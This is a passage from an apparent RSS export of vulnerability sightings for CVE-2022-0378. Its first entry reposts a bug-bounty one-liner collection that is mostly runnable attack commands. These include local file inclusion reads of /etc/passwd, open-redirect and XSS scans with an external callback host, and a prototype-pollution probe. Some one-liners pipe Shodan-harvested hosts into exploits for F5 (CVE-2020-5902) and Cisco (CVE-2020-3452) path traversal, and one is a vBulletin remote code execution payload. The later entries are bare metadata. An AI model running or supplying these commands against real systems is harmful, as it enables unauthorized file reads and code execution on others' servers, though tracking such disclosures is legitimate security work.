"2024-05-19T19:36:04.000000Z"}</description>
      <content:encoded>{"uuid": "5df5980b-2039-4e40-9785-80ec3e76b5f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "https://t.me/Secur_information_technology/50", "content": "Awesome One-liner Bug Bounty :\n\n&amp;gt; A collection of awesome one-liner scripts especially for bug bounty.\n\nThis repository stores and houses various one-liner for bug bounty tips provided by me as well as contributed by the community. Your contributions and suggestions are heartily\u2665 welcome.\n\n## Definitions\n\nThis section defines specific terms or placeholders that are used throughout one-line command/scripts.\n\n- 1.1. \"HOST\" defines one hostname, (sub)domain, or IP address, e.g. replaced by internal.host, domain.tld, sub.domain.tld, or 127.0.0.1.\n- 1.2. \"HOSTS.txt\" contains criteria 1.1 with more than one in file.\n- 2.1. \"URL\" definitely defines the URL, e.g. replaced by http://domain.tld/path/page.html or somewhat starting with HTTP/HTTPS protocol.\n- 2.2. \"URLS.txt\" contains criteria 2.1 with more than one in file.\n- 3.1. \"FILE.txt\" or \"FILE{N}.txt\" means the files needed to run the command/script according to its context and needs.\n- 4.1. \"OUT.txt\" or \"OUT{N}.txt\" means the file as the target storage result will be the command that is executed.\n\n---\n\n### Local File Inclusion\n\n\ngau HOST | gf lfi | qsreplace \"/etc/passwd\" | xargs -I% -P 25 sh -c 'curl -s \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"root:x\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n### Open-redirect\n\n\nexport LHOST=\"URL\"; gau $1 | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2&amp;gt;&amp;amp;1 | grep -q \"Location: $LHOST\" &amp;amp;&amp;amp; echo \"VULN! %\"'\n\n`bash\ncat URLS.txt | gf url | tee url-redirect.txt &amp;amp;&amp;amp; cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk &amp;gt; /dev/null\n\n### XSS\n&amp;gt; @cihanmehmet\n\nbash\ngospider -S URLS.txt -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe | tee OUT.txt\n\n\n\nbash\nwaybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt &amp;amp;&amp;amp; cat FILE.txt | dalfox -b YOURS.xss.ht pipe &amp;gt; OUT.txt\n\n\n\nbash\ncat HOSTS.txt | getJS | httpx --match-regex \"addEventListener\\((?:'|\\\")message(?:'|\\\")\"\n\n### Prototype Pollution\n\n\nbash\nsubfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt &amp;amp;&amp;amp; sed 's/$/\\/?proto[testparam]=exploit\\//' FILE.txt | page-fetch -j 'window.testparam == \"exploit\"? \"[VULNERABLE]\" : \"[NOT VULNERABLE]\"' | sed \"s/(//g\" | sed \"s/)//g\" | sed \"s/JS //g\" | grep \"VULNERABLE\"\n\n### CVE-2020-5902\n\nbash\nshodan search http.favicon.hash:-335242539 \"3992\" --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl --silent --path-as-is --insecure \"https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\" | grep -q root &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done\n\n### CVE-2020-3452\n\n\nbash\nwhile read LINE; do curl -s -k \"https://$LINE/+CSCOT+/translation-table?type=mst&amp;amp;textdomain=/%2bCSCOE%2b/portal_inc.lua&amp;amp;default-language&amp;amp;lang=../\" | head | grep -q \"Cisco\" &amp;amp;&amp;amp; echo -e \"[${GREEN}VULNERABLE${NC}] $LINE\" || echo -e \"[${RED}NOT VULNERABLE${NC}] $LINE\"; done &amp;lt; HOSTS.txt\n\n### CVE-2022-0378\n\n\nbash\ncat URLS.txt | while read h do; do curl -sk \"$h/module/?module=admin%2Fmodules%2Fmanage&amp;amp;id=test%22+onmousemove%3dalert(1)+xx=%22test&amp;amp;from_url=x\"|grep -qs \"onmouse\" &amp;amp;&amp;amp; echo \"$h: VULNERABLE\"; done\n\n### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution\n\n\nbash\nshodan search http.favicon.hash:-601665621 --fields ip_str,port --separator \" \" | awk '{print $1\":\"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&amp;amp;subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo &amp;amp;&amp;amp; \\printf \"$host \\033[0;31mVulnerable\\n\" || printf \"$host \\033[0;32mNot Vulnerable\\n\";done;`\n\n### Find JavaScript Files", "creation_timestamp": "2024-05-19T19:36:04.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/5df5980b-2039-4e40-9785-80ec3e76b5f0/export</guid>
      <pubDate>Sun, 19 May 2024 19:36:04 +0000</pubDate>
    </item>
    <item>
      <title>fc5d795f-1e35-4d21-820a-4d148c1f926f</title>
      <link>https://db.gcve.eu/sighting/fc5d795f-1e35-4d21-820a-4d148c1f926f/export</link>
      <description>{"uuid": "fc5d795f-1e35-4d21-820a-4d148c1f926f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "Telegram/XEixgT2v6lVv-v10WCuCZF76lOmF7s1VJYhuh16MDU2-kpuT", "content": "", "creation_timestamp": "2024-07-16T11:41:25.000000Z"}</description>
      <content:encoded>{"uuid": "fc5d795f-1e35-4d21-820a-4d148c1f926f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "published-proof-of-concept", "source": "Telegram/XEixgT2v6lVv-v10WCuCZF76lOmF7s1VJYhuh16MDU2-kpuT", "content": "", "creation_timestamp": "2024-07-16T11:41:25.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/fc5d795f-1e35-4d21-820a-4d148c1f926f/export</guid>
      <pubDate>Tue, 16 Jul 2024 11:41:25 +0000</pubDate>
    </item>
    <item>
      <title>6dbf732b-766c-493f-a1ce-b1569434c8fc</title>
      <link>https://db.gcve.eu/sighting/6dbf732b-766c-493f-a1ce-b1569434c8fc/export</link>
      <description>{"uuid": "6dbf732b-766c-493f-a1ce-b1569434c8fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "seen", "source": "https://gist.github.com/spynika/d36f61ba985c86eb9bce7b0d4251331c", "content": "", "creation_timestamp": "2025-02-24T06:35:53.000000Z"}</description>
      <content:encoded>{"uuid": "6dbf732b-766c-493f-a1ce-b1569434c8fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-0378", "type": "seen", "source": "https://gist.github.com/spynika/d36f61ba985c86eb9bce7b0d4251331c", "content": "", "creation_timestamp": "2025-02-24T06:35:53.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/6dbf732b-766c-493f-a1ce-b1569434c8fc/export</guid>
      <pubDate>Mon, 24 Feb 2025 06:35:53 +0000</pubDate>
    </item>
  </channel>
</rss>
